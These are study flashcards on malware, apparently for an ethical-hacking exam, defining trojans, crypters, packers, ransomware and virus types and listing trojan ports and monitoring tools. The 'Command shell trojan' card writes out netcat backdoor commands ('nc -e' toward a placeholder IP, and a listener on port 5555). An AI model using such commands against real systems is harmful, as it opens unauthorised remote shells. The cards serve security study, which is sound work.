Trojans and other Attacks Flashcards
Malware
Software designed to harm or secretly access a computer system without the owner’s informed consent. Computer contaminant
Malvertising
Embedding malware into ad networks
Malware Delivery
Downloaded from the Internet
Drive by downloading
Hijacking of peer to peer applications
Email attachment
Overt Channels
Legitimate communication channels
Covert Channels
Used to transport data in unintended ways
Wrappers
Programs that allow you to bind a trojan to an innocent file
Crypters
Software tools that use a combination of encryption and code manipulation to render malware undetectable to AV and other security-monitoring products, Fud-fully undetectable
Packers
Use compression to pack the malware executable harder to detect for antivirus engines. Extraction occurs in memory and not on desk.
Trojan Exploit Kits
Infinity
Bleeding Life
Crimepack
Blackhole Exploit Kit
Trojan
Embedded malicious code in an otherwise normal application
Types of Trojans
Defacement trojan
Proxy server trojan
Botnet trojan (tor based Chewbacca and Skynet)
Remote Access trojan (RAT, MoSucker, Optix Pro, Blackhole)
Ebanking trojan (Zeus, Spyeye)
Covert Channel Tunneling Trojan (CCTT)
A form of remote access trojan that uses a variety of exploitation techniques to create data transfer channels in previously authorized data streams. Designed to provide an external shell from within the internal environment.
Command shell trojan
Provides a backdoor to the system that you connect to via command-line access. Netcat, example: nc -e IPaddress port#
-t option will provide telnet
Example: nc -l -p 5555 opens a port in a listening state and nc IPaddress -p 5555 connects to the target machine with a telnet like connection
Netcat can be used for outbound or inbound connections over TCP or UDP, to or from any port on the machine. It offers DNS forwarding, port mapping and forwarding and proxying. It can also be used as a port scanner.
Trojan Ports
Death 2 Senna Spy 20 Hackers Paradise 31,456 TCP Wrappers 421 Doom,Satanz Backdoor 666 Silencer,WebEx 1001 RAT 1095-98 SubSeven 1243 Shivka-Burka 1600 Trojan Cow 2001 Deep Throat 6670-71 Tini 7777 Netbus 12345,12346 Whack a Mole 12361-12363 Back Orifice 31337,313338 Use netstat -an to monitor listening ports netstat -b - displays all active connections and the processes using them
Neverquest Trojan
Targets banking websites. designed to steal credentials and sensitive information and to set up VNC remote access targets
Port monitoring tools
Fport - shows same info as netstat -an but also maps them to running processes and PIDs Whats Running TCPView IceSword CurrPorts Process Explorer
Registry monitoring tools
SysAnalyzer, Tiny Watcher, Active Registry Monitor, Regshot, Malwarebytes
Service monitoring
Windows Service Manager
Service Manager Plus
Smart Utility
Verifying the integrity of system files - can act as a HIDS for trojans
Tripwire
Sigverif - creates c:\windows\system32\sigverif.txt
Virus
self-replicating program that reproduces its code by attaching copies into other executable codes
Can be distributed through virus hoaxes and fake antivirus programs
Ransomware
Malicious software designed to deny access to a computer until a ransom is paid
Wannacry
Ransomware that took advantage of an unpatched SMBv1 exploit known as Eternal Blue
Ransomware programs
Cryptorbit
Cryptolocker
CryptoDefense
Boot sector virus
Also known as a system virus, this virus type actually moves the boot sector to another location on the hard drive, forcing the virus code to be executed first
Petya ransomware overwrote the master boot record
Shell virus
Wraps itself around an application’s code, inserting its own code before the application’s
Cluster virus
Modified directory table entries so that user or system processes are pointed to the virus code itself instead of the application
Multipartite virus
Attempts to infect both files and the boot sector at the same time and refers to a virus with multiple infection vectors.
Macro virus
Usually written with Visual Basic for Applications (VBA), infects template files created by Microsoft Office apps. Melissa virus was a macro virus
Polymorphic code virus
Mutates its code using a built in polymorphic engine. Difficult to find and remove because its signature constantly changes.
Encryption virus
Uses encryption to hide the code from antivirus scanners